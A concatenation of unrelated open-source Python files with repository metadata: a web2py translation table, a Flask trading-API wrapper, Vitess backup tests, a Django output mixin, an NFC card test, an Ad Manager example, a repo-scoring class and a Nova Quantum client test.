'This will pull changes from the remote repo for application "%s"?': 'This will pull changes from the remote repo for application "%s"?',
'This will push changes to the remote repo for application "%s".': 'This will push changes to the remote repo for application "%s".',
'Ticket': 'Ticket',
'Ticket ID': 'Ticket ID',
'Ticket Missing': 'Ticket Missing',
'Time in Cache (h:m:s)': 'Time in Cache (h:m:s)',
'TM': 'TM',
'to previous version.': 'to previous version.',
'To create a plugin, name a file/folder plugin_[name]': 'To create a plugin, name a file/folder plugin_[name]',
'To emulate a breakpoint programatically, write:': 'To emulate a breakpoint programatically, write:',
'to use the debugger!': 'to use the debugger!',
'toggle breakpoint': 'toggle breakpoint',
'Toggle comment': 'Toggle comment',
'Toggle Fullscreen': 'Toggle Fullscreen',
'Traceback': 'Traceback',
'translation strings for the application': 'translation strings for the application',
'Translation strings for the application': 'Translation strings for the application',
'try': 'try',
'try something like': 'try something like',
'Try the mobile interface': 'Try the mobile interface',
'try view': 'try view',
'Type PDB debugger command in here and hit Return (Enter) to execute it.': 'Type PDB debugger command in here and hit Return (Enter) to execute it.',
'Type some Python code in here and hit Return (Enter) to execute it.': 'Type some Python code in here and hit Return (Enter) to execute it.',
'Unable to check for upgrades': 'Unable to check for upgrades',
'unable to create application "%s"': 'unable to create application "%s"',
'unable to delete file "%(filename)s"': 'unable to delete file "%(filename)s"',
'unable to delete file plugin "%(plugin)s"': 'unable to delete file plugin "%(plugin)s"',
'Unable to determine the line number!': 'Unable to determine the line number!',
'Unable to download': 'Unable to download',
'Unable to download app because:': 'Unable to download app because:',
'Unable to download because': 'Unable to download because',
'unable to download layout': 'unable to download layout',
'unable to download plugin: %s': 'unable to download plugin: %s',
'Unable to download the list of plugins': 'Unable to download the list of plugins',
'unable to install plugin "%s"': 'unable to install plugin "%s"',
'unable to parse csv file': 'не е възможна обработката на csv файла',
'unable to uninstall "%s"': 'unable to uninstall "%s"',
'unable to upgrade because "%s"': 'unable to upgrade because "%s"',
'uncheck all': 'uncheck all',
'Uninstall': 'uninstall',
'Unsupported webserver working mode: %s': 'Unsupported webserver working mode: %s',
'update': 'update',
'update all languages': 'update all languages',
'Update:': 'Update:',
'Upgrade': 'Upgrade',
'upgrade now to %s': 'upgrade now to %s',
'upgrade web2py now': 'upgrade web2py now',
'upload': 'upload',
'Upload': 'Upload',
'Upload & install packed application': 'Upload & install packed application',
'Upload a package:': 'Upload a package:',
'Upload and install packed application': 'Upload and install packed application',
'upload application:': 'upload application:',
'Upload existing application': 'Upload existing application',
'upload file:': 'upload file:',
'upload plugin file:': 'upload plugin file:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.',
'Use an url:': 'Use an url:',
'User': 'User',
'Username': 'Username',
'Users': 'Users',
'Using the shell may lock the database to other users of this app.': 'Using the shell may lock the database to other users of this app.',
'variables': 'variables',
'Version': 'Version',
'Versioning': 'Versioning',
'versioning': 'versioning',
'view': 'view',
'Views': 'Views',
'views': 'views',
'Warning!': 'Warning!',
'WARNING:': 'WARNING:',
'WARNING: The following views could not be compiled:': 'WARNING: The following views could not be compiled:',
'Web Framework': 'Web Framework',
'web2py Admin Password': 'web2py Admin Password',
'web2py apps to deploy': 'web2py apps to deploy',
'web2py Debugger': 'web2py Debugger',
'web2py downgrade': 'web2py downgrade',
'web2py is up to date': 'web2py is up to date',
'web2py online debugger': 'web2py online debugger',
'web2py Recent Tweets': 'web2py Recent Tweets',
'web2py upgrade': 'web2py upgrade',
'web2py upgraded; please restart it': 'web2py upgraded; please restart it',
'Welcome to web2py': 'Добре дошъл в web2py',
'Working...': 'Working...',
'WSGI reference name': 'WSGI reference name',
'YES': 'YES',
'Yes': 'Yes',
'You can also set and remove breakpoint in the edit window, using the Toggle Breakpoint button': 'You can also set and remove breakpoint in the edit window, using the Toggle Breakpoint button',
'You can inspect variables using the console below': 'You can inspect variables using the console below',
'You have one more login attempt before you are locked out': 'You have one more login attempt before you are locked out',
'You need to set up and reach a': 'You need to set up and reach a',
'You only need these if you have already registered': 'You only need these if you have already registered',
'Your application will be blocked until you click an action button (next, step, continue, etc.)': 'Your application will be blocked until you click an action button (next, step, continue, etc.)',
}
| xiang12835/python_web | py2_web2py/web2py/applications/admin/languages/bg.py | Python | apache-2.0 | 35,738 |
# -*- coding: utf-8 -*-
from flask import Flask, jsonify, request, abort, make_response
from futu_server_api import *
from db import save_update_token
from db import delete_tokens
from db import list_cards
import logging
import logging.config
import json
app = Flask(__name__)
logging.config.fileConfig('./conf/log.ini')
no_db_logger = logging.getLogger()
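# Validate that the request JSON carries app_account, card and appid,
# then build a futu API client from those fields (otherwise abort with HTTP 400).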
def check_parameters(pjson):
    if not pjson or 'app_account' not in pjson or 'card' not in pjson or 'appid' not in pjson:
no_db_logger.info('No Parameter')
abort(400)
cli = {'account':pjson['app_account'], 'card':pjson['card'], 'appid':pjson['appid']}
return client(cli['account'], cli['card'], cli['appid'])
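# Turn an API response into a log line: pass client warnings through,
# report SUCCESS when result_code is 0, otherwise include the error message
# and the request payload.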
def log_handler(myjson, mytitle):
if 'ClientWarning' in myjson:
return '%s' % myjson['ClientWarning']
elif myjson['result_code'] == 0:
return 'SUCCESS'
else:
return 'FAIL ,REASON OF FAILURE:%s ,PARAMETER:%s' % (myjson['error_msg'], request.json)
@app.route('/')
def hello_world():
no_db_logger.info('server start#####')
return 'hello 22222222 world!'
@app.route('/api/v1/tradetoken', methods=['POST'])
def trade_token():
trade_pswd = request.json['trade_pswd']
account = request.json['app_account']
card = request.json['card']
appid = request.json['appid']
cc = check_parameters(request.json)
message = cc.get_trade_token(trade_pswd)
if message['result_code'] != 0 and message['error_msg'] == 'didn\'t get accesstoken':
no_db_logger.info('didn\'t get accesstoken')
return json.dumps({'result_code':2,'error_msg':'didn\'t get accesstoken'}, ensure_ascii=False)
if message['result_code'] == 0:
token = message['data']['trade_token']
save_update_token(account, appid, None, token, card, True)
return jsonify(**message)
@app.route('/api/v1/account', methods=['POST'])
def get_account_detail():
cc = check_parameters(request.json)
message = cc.get_account_detail()
logtext = log_handler(message, '获取账户信息')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/account/cash', methods=['POST'])
def get_account_cash():
cc = check_parameters(request.json)
message = cc.get_account_cash()
logtext = log_handler(message, '获取账户现金')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/account/portfolio', methods=['POST'])
def get_account_portfolio():
cc = check_parameters(request.json)
message = cc.get_account_portfolio()
logtext = log_handler(message, '获取账户持仓')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/get_list_orders', methods=['POST'])
def get_list_orders():
date_begin = request.json['date_begin']
date_end = request.json['date_end']
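    # Note: date_begin and date_end are read here but not forwarded to get_list_orders.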
cc = check_parameters(request.json)
message = cc.get_list_orders()
logtext = log_handler(message, '获取订单列表')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/get_list_trades', methods=['POST'])
def get_list_trades():
cc = check_parameters(request.json)
message = cc.get_list_trades()
logtext = log_handler(message, '获取交易列表')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/place_order', methods=['POST'])
def place_order():
code = request.json['code']
quantity = request.json['quantity']
price = request.json['price']
side = request.json['side']
ltype = request.json['type']
cc = check_parameters(request.json)
message = cc.place_order(code, quantity, price, side, ltype)
logtext = log_handler(message, '下单')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/change_order', methods=['POST'])
def change_order():
order_id = request.json['order_id']
quantity = request.json['quantity']
price = request.json['price']
cc = check_parameters(request.json)
message = cc.change_order(order_id, quantity, price)
logtext = log_handler(message, '改单')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/cancle_order', methods=['POST'])
def cancle_order():
order_id = request.json['order_id']
cc = check_parameters(request.json)
message = cc.cancel_order(order_id)
logtext = log_handler(message, '撤单')
no_db_logger.info(logtext)
return json.dumps(message, ensure_ascii=False)
@app.route('/api/v1/save_token', methods=['POST'])
def save_token():
account = request.json['app_account']
appid = request.json['appid']
market = request.json['market']
token = request.json['token']
card = request.json['card']
card_desc = request.json['text']
DB_result = save_update_token(account, appid, market, token, card, False, card_desc)
if DB_result == 'success':
no_db_logger.info('token save success')
return json.dumps({'result_code':0,'error_msg':''}, ensure_ascii=False)
else:
no_db_logger.info('token save fail')
return json.dumps({'result_code':1,'error_msg':'token保存失败'}, ensure_ascii=False)
@app.route('/api/v1/delete_token', methods=['POST'])
def delete_token():
appid = request.json['appid']
account = request.json['app_account']
DB_result = delete_tokens(account, appid)
if DB_result == 'success':
no_db_logger.info('token delete success')
return json.dumps({'result_code':0,'error_msg':''}, ensure_ascii=False)
else:
no_db_logger.info('token delete fail')
return json.dumps({'result_code':1,'error_msg':'token删除失败'}, ensure_ascii=False)
@app.route('/api/v1/list_card', methods=['POST'])
def list_card():
appid = request.json['appid']
account = request.json['app_account']
cards = list_cards(account, appid)
message = dict(cards=cards)
if isinstance(cards, list):
no_db_logger.info('list cards success')
return json.dumps({'result_code':0,'error_msg':'','data':message}, ensure_ascii=False)
else:
no_db_logger.info('list cards fail')
return json.dumps({'result_code':1,'error_msg':'查询账户卡号失败'}, ensure_ascii=False)
if __name__ == '__main__':
app.run()
| zznn/futu-openAPI | app/mainapp.py | Python | apache-2.0 | 6,014 |
#!/usr/bin/env python
# Copyright 2017 The Vitess Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import unittest
import datetime
import MySQLdb
import environment
import tablet
import vtbackup
import utils
from mysql_flavor import mysql_flavor
use_mysqlctld = False
use_xtrabackup = False
stream_mode = 'tar'
tablet_master = None
tablet_replica1 = None
tablet_replica2 = None
backup_tablet = None
xtrabackup_args = []
new_init_db = ''
db_credentials_file = ''
def setUpModule():
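  """Bring up the topo server, DB credential files and MySQL for the test tablets."""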
global xtrabackup_args
xtrabackup_args = ['-backup_engine_implementation',
'xtrabackup',
'-xtrabackup_stream_mode',
stream_mode,
'-xtrabackup_user=vt_dba',
'-xtrabackup_backup_flags',
'--password=VtDbaPass']
global new_init_db, db_credentials_file
global tablet_master, tablet_replica1, tablet_replica2, backup_tablet
tablet_master = tablet.Tablet(use_mysqlctld=use_mysqlctld,
vt_dba_passwd='VtDbaPass')
tablet_replica1 = tablet.Tablet(use_mysqlctld=use_mysqlctld,
vt_dba_passwd='VtDbaPass')
tablet_replica2 = tablet.Tablet(use_mysqlctld=use_mysqlctld,
vt_dba_passwd='VtDbaPass')
backup_tablet = vtbackup.Vtbackup(vt_dba_passwd='VtDbaPass')
try:
environment.topo_server().setup()
credentials = {
'vt_dba': ['VtDbaPass'],
'vt_app': ['VtAppPass'],
'vt_allprivs': ['VtAllprivsPass'],
'vt_repl': ['VtReplPass'],
'vt_filtered': ['VtFilteredPass'],
}
db_credentials_file = environment.tmproot+'/db_credentials.json'
with open(db_credentials_file, 'w') as fd:
fd.write(json.dumps(credentials))
# Determine which column is used for user passwords in this MySQL version.
proc = tablet_master.init_mysql()
if use_mysqlctld:
tablet_master.wait_for_mysqlctl_socket()
else:
utils.wait_procs([proc])
try:
tablet_master.mquery('mysql', 'select password from mysql.user limit 0',
user='root')
password_col = 'password'
except MySQLdb.DatabaseError:
password_col = 'authentication_string'
utils.wait_procs([tablet_master.teardown_mysql()])
tablet_master.remove_tree(ignore_options=True)
# Create a new init_db.sql file that sets up passwords for all users.
# Then we use a db-credentials-file with the passwords.
new_init_db = environment.tmproot + '/init_db_with_passwords.sql'
with open(environment.vttop + '/config/init_db.sql') as fd:
init_db = fd.read()
with open(new_init_db, 'w') as fd:
fd.write(init_db)
fd.write(mysql_flavor().change_passwords(password_col))
    logging.debug("initializing mysql %s", str(datetime.datetime.now()))
# start mysql instance external to the test
setup_procs = [
tablet_master.init_mysql(init_db=new_init_db,
extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica1.init_mysql(init_db=new_init_db,
extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica2.init_mysql(init_db=new_init_db,
extra_args=['-db-credentials-file',
db_credentials_file])
]
if use_mysqlctld:
tablet_master.wait_for_mysqlctl_socket()
tablet_replica1.wait_for_mysqlctl_socket()
tablet_replica2.wait_for_mysqlctl_socket()
else:
utils.wait_procs(setup_procs)
    logging.debug("done initializing mysql %s", str(datetime.datetime.now()))
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [
tablet_master.teardown_mysql(extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica1.teardown_mysql(extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica2.teardown_mysql(extra_args=['-db-credentials-file',
db_credentials_file])
]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
tablet_master.remove_tree()
tablet_replica1.remove_tree()
tablet_replica2.remove_tree()
backup_tablet.remove_tree()
class TestBackup(unittest.TestCase):
def setUp(self):
for t in tablet_master, tablet_replica1:
t.create_db('vt_test_keyspace')
def tearDown(self):
for t in tablet_master, tablet_replica1, tablet_replica2:
t.kill_vttablet()
tablet.Tablet.check_vttablet_count()
environment.topo_server().wipe()
for t in [tablet_master, tablet_replica1, tablet_replica2]:
t.reset_replication()
t.set_semi_sync_enabled(master=False, slave=False)
t.clean_dbs()
for backup in self._list_backups():
self._remove_backup(backup)
def _init_tablets(self,init=True,start=True):
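    """Create the master and replica1 tablets for test_keyspace/0,
    optionally starting them and running InitShardMaster."""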
xtra_args = ['-db-credentials-file', db_credentials_file]
if use_xtrabackup:
xtra_args.extend(xtrabackup_args)
tablet_master.init_tablet('replica', 'test_keyspace', '0', start=start,
supports_backups=True,
extra_args=xtra_args)
tablet_replica1.init_tablet('replica', 'test_keyspace', '0', start=start,
supports_backups=True,
extra_args=xtra_args)
if init:
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/0',
tablet_master.tablet_alias])
_create_vt_insert_test = '''create table vt_insert_test (
id bigint auto_increment,
msg varchar(64),
primary key (id)
) Engine=InnoDB'''
def _insert_data(self, t, index):
"""Add a single row with value 'index' to the given tablet."""
t.mquery(
'vt_test_keyspace',
"insert into vt_insert_test (msg) values ('test %s')" %
index, write=True)
def _check_data(self, t, count, msg):
"""Check that the specified tablet has the expected number of rows."""
timeout = 10
while True:
try:
result = t.mquery(
'vt_test_keyspace', 'select count(*) from vt_insert_test')
if result[0][0] == count:
break
except MySQLdb.DatabaseError:
        # Ignore exceptions; we'll just time out. (The table creation can
        # take some time to replicate, and in rare cases we get a
        # 'table vt_insert_test does not exist' exception.)
logging.exception('exception waiting for data to replicate')
timeout = utils.wait_step(msg, timeout)
def _restore(self, t, tablet_type='replica',wait_for_state='SERVING'):
"""Erase mysql/tablet dir, then start tablet with restore enabled."""
logging.debug("restoring tablet %s",str(datetime.datetime.now()))
self._reset_tablet_dir(t)
xtra_args = ['-db-credentials-file', db_credentials_file]
if use_xtrabackup:
xtra_args.extend(xtrabackup_args)
t.start_vttablet(wait_for_state=wait_for_state,
init_tablet_type=tablet_type,
init_keyspace='test_keyspace',
init_shard='0',
supports_backups=True,
extra_args=xtra_args)
logging.debug("done restoring tablet %s",str(datetime.datetime.now()))
def _reset_tablet_dir(self, t):
"""Stop mysql, delete everything including tablet dir, restart mysql."""
extra_args = ['-db-credentials-file', db_credentials_file]
utils.wait_procs([t.teardown_mysql(extra_args=extra_args)])
# Specify ignore_options because we want to delete the tree even
# if the test's -k / --keep-logs was specified on the command line.
t.remove_tree(ignore_options=True)
logging.debug("starting mysql %s",str(datetime.datetime.now()))
proc = t.init_mysql(init_db=new_init_db, extra_args=extra_args)
if use_mysqlctld:
t.wait_for_mysqlctl_socket()
else:
utils.wait_procs([proc])
logging.debug("done starting mysql %s",str(datetime.datetime.now()))
def _list_backups(self):
"""Get a list of backup names for the test shard."""
backups, _ = utils.run_vtctl(tablet.get_backup_storage_flags() +
['ListBackups', 'test_keyspace/0'],
mode=utils.VTCTL_VTCTL, trap_output=True)
return backups.splitlines()
def _remove_backup(self, backup):
"""Remove a named backup from the test shard."""
utils.run_vtctl(
tablet.get_backup_storage_flags() +
['RemoveBackup', 'test_keyspace/0', backup],
auto_log=True, mode=utils.VTCTL_VTCTL)
  def _backup_only(self, t, initial_backup=False):
    """Erase the mysql/tablet dir, then run a standalone vtbackup job against the shard."""
logging.debug('starting backup only job')
t.remove_tree(ignore_options=True)
extra_args = ['-allow_first_backup','-db-credentials-file', db_credentials_file]
if use_xtrabackup:
extra_args.extend(xtrabackup_args)
if initial_backup:
extra_args.extend(["-initial_backup"])
logging.debug("starting backup tablet %s",str(datetime.datetime.now()))
proc = t.start_vtbackup(init_db=new_init_db,
init_keyspace='test_keyspace',
init_shard='0',
extra_args=extra_args)
    logging.debug('vtbackup started, waiting for process to end %s', proc)
utils.wait_procs([proc],True)
logging.debug("backup tablet done %s",str(datetime.datetime.now()))
def test_tablet_initial_backup(self):
self._test_initial_backup()
    # Restore the shard from the initial backup
self._init_tablets(init=False,start=False)
# Restore the Tablets
self._restore(tablet_master, tablet_type='replica',wait_for_state="NOT_SERVING")
utils.run_vtctl(['TabletExternallyReparented',tablet_master.tablet_alias])
self._restore(tablet_replica1, tablet_type='replica')
# Run the entire backup test
self._test_first_backup('replica', True)
  def _test_initial_backup(self):
    """Test the initial backup flow.
    The initial-backup test will:
    - create a shard using vtbackup and -initial_backup
    - create the rest of the cluster by restoring from that backup
    - externally reparent to a master tablet
    - insert some data
    - verify that the cluster is working
    - take a second backup
    - bring up a second replica, and restore from the second backup
    - list the backups, then remove them
    """
self._backup_only(backup_tablet,initial_backup=True)
backups = self._list_backups()
logging.debug('list of backups after initial: %s', backups)
self.assertEqual(len(backups), 1)
def test_tablet_backup_only(self):
self._init_tablets()
self._test_first_backup('replica', True)
def _test_first_backup(self, tablet_type, backup_only):
"""Test backup flow.
test_backup will:
- create a shard with master and replica1 only
- run InitShardMaster
- insert some data
- take a backup
- insert more data on the master
- bring up tablet_replica2 after the fact, let it restore the backup
- check all data is right (before+after backup data)
- list the backup, remove it
    Args:
      tablet_type: 'replica' or 'rdonly'.
      backup_only: if True, take the backup with a standalone vtbackup job
        instead of the Backup vtctl command.
    """
# insert data on master, wait for slave to get it
backups_count = len(self._list_backups())
tablet_master.mquery('vt_test_keyspace', self._create_vt_insert_test)
self._insert_data(tablet_master, 1)
self._check_data(tablet_replica1, 1, 'replica1 tablet getting data')
# backup the slave
alias = tablet_replica1.tablet_alias
logging.debug("taking backup %s",str(datetime.datetime.now()))
if not backup_only:
utils.run_vtctl(['Backup', tablet_replica1.tablet_alias], auto_log=True)
else:
self._backup_only(backup_tablet)
alias = backup_tablet.tablet_alias
logging.debug("done taking backup %s",str(datetime.datetime.now()))
# end if
# check that the backup shows up in the listing
backups = self._list_backups()
logging.debug('list of backups: %s', backups)
self.assertEqual(len(backups), backups_count+1)
# insert more data on the master
self._insert_data(tablet_master, 2)
# now bring up the other slave, letting it restore from backup.
self._restore(tablet_replica2, tablet_type=tablet_type)
# check the new slave has the data
self._check_data(tablet_replica2, 2, 'replica2 tablet getting data')
# check that the restored slave has the right local_metadata
result = tablet_replica2.mquery('_vt', 'select * from local_metadata')
metadata = {}
for row in result:
metadata[row[0]] = row[1]
self.assertEqual(metadata['Alias'], 'test_nj-0000062346')
self.assertEqual(metadata['ClusterAlias'], 'test_keyspace.0')
self.assertEqual(metadata['DataCenter'], 'test_nj')
if tablet_type == 'replica':
self.assertEqual(metadata['PromotionRule'], 'neutral')
else:
self.assertEqual(metadata['PromotionRule'], 'must_not')
for backup in backups:
self._remove_backup(backup)
backups = self._list_backups()
logging.debug('list of backups after remove: %s', backups)
self.assertEqual(len(backups), 0)
tablet_replica2.kill_vttablet()
if __name__ == '__main__':
utils.main()
| davygeek/vitess | test/backup_only.py | Python | apache-2.0 | 14,271 |
import os
from django.core.management.color import supports_color
from django.utils import termcolors
class VerboseCommandMixin(object):
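    """Mixin that adds colored, dry-run-aware output helpers to management commands."""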
def __init__(self, *args, **kwargs):
super(VerboseCommandMixin, self).__init__(*args, **kwargs)
self.dry_run = False
if supports_color():
opts = ('bold',)
self.style.EXISTS = \
termcolors.make_style(fg='blue', opts=opts)
self.style.APPEND = \
termcolors.make_style(fg='yellow', opts=opts)
self.style.CREATE = \
termcolors.make_style(fg='green', opts=opts)
self.style.REVERT = \
termcolors.make_style(fg='magenta', opts=opts)
self.style.BACKUP = \
termcolors.make_style(fg='cyan', opts=opts)
def msg(self, action, path):
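        # Print a colored "<action> <path>" line; during a dry run, withheld
        # actions (create/append/revert) are reported as "did not <action>".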
is_withholding_action = False
non_actions = set(['create', 'append', 'revert'])
if self.dry_run and action in non_actions:
is_withholding_action = True
if hasattr(self.style, action.upper()):
s = getattr(self.style, action.upper())
action = s(action)
if is_withholding_action:
action = self.style.NOTICE('did not ') + action
output = '\t{0:>25}\t{1:<}\n'.format(action, os.path.relpath(path))
self.stdout.write(output)
def log(self, output):
if self.verbose:
self.stdout.write(output)
| noslenfa/tdjangorest | uw/lib/python2.7/site-packages/generate_scaffold/management/verbosity.py | Python | apache-2.0 | 1,463 |
import time
from pynfcreader.sessions.iso14443.iso14443a import Iso14443ASession
def test_iso_14443_a_card_1_generic(hydranfc_connection):
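    # Cycle the RF field, poll for a card, then select the PPSE, CB and
    # Mastercard applications and check the raw responses.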
hn = Iso14443ASession(drv=hydranfc_connection, block_size=120)
hn.connect()
hn.field_off()
time.sleep(0.1)
hn.field_on()
hn.polling()
r = hn.send_apdu("00 a4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00")
assert b'oW\x84\x0e2PAY.S.DDF01\xa5E\xbf\x0cBO\x07\xa0\x00\x00\x00B\x10\x10P\x02\x87\x01\x01\x9f(\x08@\x02\x00\x00\x00\x00a#O\x07\xa0\x00\x00\x00\x04\x10\nMASTERCARD\x02\x9f(\x08@\x00 \x00\x00\x00\x00' == r
r = hn.send_apdu("00 a4 04 00 07 A0 00 00 00 42 10 10 00")
assert b'o?\x84\x07\xa0\x00\x00\x00B\x104P\x02CB\x87\x01\x01\x9f\x11\x01\x12\x0eTransacti CB_-\x04fren\xbf\xdf`\x02\x0b\x14\x9fM\x02\x0b\x14\xdf\x04' == r
r = hn.send_apdu("00 a4 04 00 07 A0 00 00 00 04 10 10 00")
assert b'o?\x84\x07\xa0\x00\x00\x00\x04\x104P\nMASTERCA\x87\x01\x02\x9f\x11\x01\x01\x9f\x12\nMTERCARD_-\x04fn\xbf\x0c\n\xdf`\x02\x0b\x14\x9fM\x14' == r
hn.field_off()
| gvinet/pynfcreader | tests/tests_iso_14443_a_card_1_hydranfc_v2.py | Python | apache-2.0 | 1,077 |
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example creates new proposals.
To determine which proposals exist, run get_all_proposals.py.
"""
import uuid
# Import appropriate modules from the client library.
from googleads import ad_manager
ADVERTISER_ID = 'INSERT_ADVERTISER_ID_HERE'
PRIMARY_SALESPERSON_ID = 'INSERT_PRIMARY_SALESPERSON_ID_HERE'
SECONDARY_SALESPERSON_ID = 'INSERT_SECONDARY_SALESPERSON_ID_HERE'
PRIMARY_TRAFFICKER_ID = 'INSERT_PRIMARY_TRAFFICKER_ID_HERE'
def main(client, advertiser_id, primary_salesperson_id,
secondary_salesperson_id, primary_trafficker_id):
# Initialize appropriate services.
proposal_service = client.GetService('ProposalService', version='v201811')
network_service = client.GetService('NetworkService', version='v201811')
# Create proposal objects.
proposal = {
'name': 'Proposal #%s' % uuid.uuid4(),
'advertiser': {
'companyId': advertiser_id,
'type': 'ADVERTISER'
},
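      # Salesperson splits and probabilityOfClose are expressed in
      # millipercent, so 75000 means 75% and 100000 means 100%.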
'primarySalesperson': {
'userId': primary_salesperson_id,
'split': '75000'
},
'secondarySalespeople': [{
'userId': secondary_salesperson_id,
'split': '25000'
}],
'primaryTraffickerId': primary_trafficker_id,
'probabilityOfClose': '100000',
'budget': {
'microAmount': '100000000',
'currencyCode': network_service.getCurrentNetwork()['currencyCode']
},
'billingCap': 'CAPPED_CUMULATIVE',
'billingSource': 'DFP_VOLUME'
}
# Add proposals.
proposals = proposal_service.createProposals([proposal])
# Display results.
for proposal in proposals:
print ('Proposal with id "%s" and name "%s" was created.'
% (proposal['id'], proposal['name']))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, ADVERTISER_ID, PRIMARY_SALESPERSON_ID,
SECONDARY_SALESPERSON_ID, PRIMARY_TRAFFICKER_ID)
| Aloomaio/googleads-python-lib | examples/ad_manager/v201811/proposal_service/create_proposals.py | Python | apache-2.0 | 2,591 |
__author__ = 'Javier'
class Project(object):
def __init__(self, forks, stars, watchs):
self._forks = int(forks)
self._stars = int(stars)
self._watchs = int(watchs)
@property
def forks(self):
return self._forks
@property
def stars(self):
return self._stars
@property
def watchs(self):
return self._watchs
class GIndex(object):
def calculate(self, project):
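        # Forks are weighted three times as heavily as stars and watchers.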
return project.forks * 3 + project.stars + project.watchs
class ProjectRepositoryService(object):
def __init__(self, conector):
self.conector = conector
self.project_factory = ProjectFactory()
def find(self, user, repo_name):
raw_json = self._read_repo(user, repo_name)
return self.project_factory.build_from(raw_json)
def _read_repo(self, user, repo_name):
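        # Return the raw repo dict whose name matches, or None if the user has no such repo.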
repos = self.conector.read_all(user)
for repo in repos:
if repo['name'] == repo_name:
return repo
return None
class ProjectFactory(object):
def build_from(self, json_project):
        # Argument order matches Project(forks, stars, watchs).
        return Project(json_project['forks_count'],
                       json_project['stargazers_count'],
                       json_project['watchers_count']) | javierj/kobudo-katas | Kata-RestConsumer/gindex.py | Python | apache-2.0 | 1,259 |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import uuid
import mox
from oslo.config import cfg
from quantumclient.v2_0 import client
from nova.compute import instance_types
from nova import context
from nova import exception
from nova.network import model
from nova.network import quantumv2
from nova.network.quantumv2 import api as quantumapi
from nova import test
from nova import utils
CONF = cfg.CONF
#NOTE: Quantum client raises Exception which is discouraged by HACKING.
# We set this variable here and use it for assertions below to avoid
# the hacking checks until we can make quantum client throw a custom
# exception class instead.
QUANTUM_CLIENT_EXCEPTION = Exception
class MyComparator(mox.Comparator):
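    """Mox comparator that compares dicts, lists and tuples recursively by value."""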
def __init__(self, lhs):
self.lhs = lhs
def _com_dict(self, lhs, rhs):
if len(lhs) != len(rhs):
return False
for key, value in lhs.iteritems():
if key not in rhs:
return False
rhs_value = rhs[key]
if not self._com(value, rhs_value):
return False
return True
def _com_list(self, lhs, rhs):
if len(lhs) != len(rhs):
return False
for lhs_value in lhs:
if lhs_value not in rhs:
return False
return True
def _com(self, lhs, rhs):
if lhs is None:
return rhs is None
if isinstance(lhs, dict):
if not isinstance(rhs, dict):
return False
return self._com_dict(lhs, rhs)
if isinstance(lhs, list):
if not isinstance(rhs, list):
return False
return self._com_list(lhs, rhs)
if isinstance(lhs, tuple):
if not isinstance(rhs, tuple):
return False
return self._com_list(lhs, rhs)
return lhs == rhs
def equals(self, rhs):
return self._com(self.lhs, rhs)
def __repr__(self):
return str(self.lhs)
class TestQuantumClient(test.TestCase):
def test_withtoken(self):
self.flags(quantum_url='http://anyhost/')
self.flags(quantum_url_timeout=30)
my_context = context.RequestContext('userid',
'my_tenantid',
auth_token='token')
self.mox.StubOutWithMock(client.Client, "__init__")
client.Client.__init__(
endpoint_url=CONF.quantum_url,
token=my_context.auth_token,
timeout=CONF.quantum_url_timeout,
insecure=False).AndReturn(None)
self.mox.ReplayAll()
quantumv2.get_client(my_context)
def test_withouttoken_keystone_connection_error(self):
self.flags(quantum_auth_strategy='keystone')
self.flags(quantum_url='http://anyhost/')
my_context = context.RequestContext('userid', 'my_tenantid')
self.assertRaises(QUANTUM_CLIENT_EXCEPTION,
quantumv2.get_client,
my_context)
def test_withouttoken_keystone_not_auth(self):
self.flags(quantum_auth_strategy=None)
self.flags(quantum_url='http://anyhost/')
self.flags(quantum_url_timeout=30)
my_context = context.RequestContext('userid', 'my_tenantid')
self.mox.StubOutWithMock(client.Client, "__init__")
client.Client.__init__(
endpoint_url=CONF.quantum_url,
auth_strategy=None,
timeout=CONF.quantum_url_timeout,
insecure=False).AndReturn(None)
self.mox.ReplayAll()
quantumv2.get_client(my_context)
class TestQuantumv2(test.TestCase):
